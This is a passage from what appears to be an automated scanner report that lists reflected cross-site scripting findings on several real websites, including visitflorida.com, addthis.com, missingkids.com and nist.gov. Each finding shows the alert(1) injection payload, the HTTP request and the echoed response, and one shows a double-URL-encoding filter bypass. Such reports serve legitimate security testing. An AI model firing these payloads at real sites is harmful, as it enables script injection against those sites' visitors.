Date: Sat, 30 Apr 2011 12:41:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 162316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!--
//configuration
OAS_url = 'http://oascentral.visitflorida.com/RealMedia/ads/';
OAS_sitepage = 'www.VISITFLORIDA.com/facebook_logged_in.phpe7b3e'-alert(1)-'bdf8821e492home';
OAS_listpos = 'Middle1,Bottom,Right,x07,x08,x09,x10,x11,x12,x13,x14';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 11;
OAS_rn = '
...[SNIP]...

3.162. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /florida_vacation_auction/auction_details.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8367e"-alert(1)-"b0be0104df4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /florida_vacation_auction8367e"-alert(1)-"b0be0104df4/auction_details.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/florida_vacation_auction8367e"-alert(1)-"b0be0104df4/auction_details.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&r
...[SNIP]...

3.163. http://www.visitflorida.com/florida_vacation_auction/auction_details.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /florida_vacation_auction/auction_details.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a65c"-alert(1)-"d69575a4d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /florida_vacation_auction/auction_details.php2a65c"-alert(1)-"d69575a4d7 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
       target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/florida_vacation_auction/auction_details.php2a65c"-alert(1)-"d69575a4d7";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.164. http://www.visitflorida.com/floridalive [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94549"-alert(1)-"cff8ca947d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /floridalive94549"-alert(1)-"cff8ca947d0 HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:04:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=gbl4cbv6pbr6skk7epjos56om6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/floridalive94549"-alert(1)-"cff8ca947d0";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.165. http://www.visitflorida.com/floridalive [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a84"-alert(1)-"67d3bce7207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /floridalive?f6a84"-alert(1)-"67d3bce7207=1 HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=5jdbskaopdg012apacf6dqm5h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/floridalive?f6a84"-alert(1)-"67d3bce7207=1";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(saja
...[SNIP]...

3.166. http://www.visitflorida.com/images/webcam.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /images/webcam.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be23"-alert(1)-"209a4580ba0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7be23"-alert(1)-"209a4580ba0/webcam.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
quest_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/images7be23"-alert(1)-"209a4580ba0/webcam.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + es
...[SNIP]...

3.167. http://www.visitflorida.com/images/webcam.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /images/webcam.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7032f"-alert(1)-"b913a62d629 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/webcam.php7032f"-alert(1)-"b913a62d629 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
+ "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/images/webcam.php7032f"-alert(1)-"b913a62d629";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.168. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3720"-alert(1)-"4ed0587ae69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includesd3720"-alert(1)-"4ed0587ae69/js/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
est_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includesd3720"-alert(1)-"4ed0587ae69/js/footerSurvey.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&r
...[SNIP]...

3.169. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48bbc"-alert(1)-"a5c8345a95b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/js48bbc"-alert(1)-"a5c8345a95b/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includes/js48bbc"-alert(1)-"a5c8345a95b/footerSurvey.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=
...[SNIP]...

3.170. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e396"-alert(1)-"fea77290035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/js/footerSurvey.php8e396"-alert(1)-"fea77290035 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
ax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includes/js/footerSurvey.php8e396"-alert(1)-"fea77290035";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.171. http://www.workoneworks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workoneworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 513f2"><script>alert(1)</script>6c36e2d12eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?513f2"><script>alert(1)</script>6c36e2d12eb=1 HTTP/1.1
Host: www.workoneworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 580


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>WorkOne: MAKE YOUR MOVE </title>
<META name="description" content="WorkO
...[SNIP]...
<frame src="http://www.in.gov/dwd/WorkOne//?513f2"><script>alert(1)</script>6c36e2d12eb=1" frameborder="0" />
...[SNIP]...

3.172. http://www.workoneworks.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workoneworks.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8bb8"><script>alert(1)</script>27c9e25d6ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c8bb8"><script>alert(1)</script>27c9e25d6ef=1 HTTP/1.1
Host: www.workoneworks.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 591


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>WorkOne: MAKE YOUR MOVE </title>
<META name="description" content="WorkO
...[SNIP]...
<frame src="http://www.in.gov/dwd/WorkOne//favicon.ico?c8bb8"><script>alert(1)</script>27c9e25d6ef=1" frameborder="0" />
...[SNIP]...

3.173. https://secure.missingkids.com/missingkids/servlet/CybertipServlet [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.missingkids.com
Path:   /missingkids/servlet/CybertipServlet

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3091"><script>alert(1)</script>2d2ab01185f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /missingkids/servlet/CybertipServlet HTTP/1.1
Host: secure.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d3091"><script>alert(1)</script>2d2ab01185f

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 30 Apr 2011 12:28:49 GMT
Content-type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...
<INPUT TYPE="hidden" NAME="referrer" VALUE="http://www.google.com/search?hl=en&q=d3091"><script>alert(1)</script>2d2ab01185f">
...[SNIP]...

3.174. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2747e%2522%253balert%25281%2529%252f%252fa146450da24 was submitted in the Referer HTTP header. This input was echoed as 2747e";alert(1)//a146450da24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2747e%2522%253balert%25281%2529%252f%252fa146450da24

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96589

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=2747e%2522%253balert%25281%2529%252f%252fa146450da24";addthis_title="2747e";alert(1)//a146450da24 - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

3.175. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 37b00<script>alert(1)</script>d23ffaf1246 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=37b00<script>alert(1)</script>d23ffaf1246

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96613

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>d23ffaf1246";addthis_title="37b00<script>alert(1)</script>d23ffaf1246 - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

3.176. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85189"><script>alert(1)</script>7030b33bcdc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=85189"><script>alert(1)</script>7030b33bcdc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96631

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=85189"><script>alert(1)</script>7030b33bcdc" />
...[SNIP]...

3.177. http://www.nist.gov/cgi-bin/exit_nist.cgi [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /cgi-bin/exit_nist.cgi

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 37ba9--><script>alert(1)</script>c42eb69629a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/exit_nist.cgi HTTP/1.1
Host: www.nist.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304125248634_871119"}; CFTOKEN=89200427; fsr.a=1304125245932; CFID=17042989;
Referer: http://www.google.com/search?hl=en&q=37ba9--><script>alert(1)</script>c42eb69629a

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: Apache
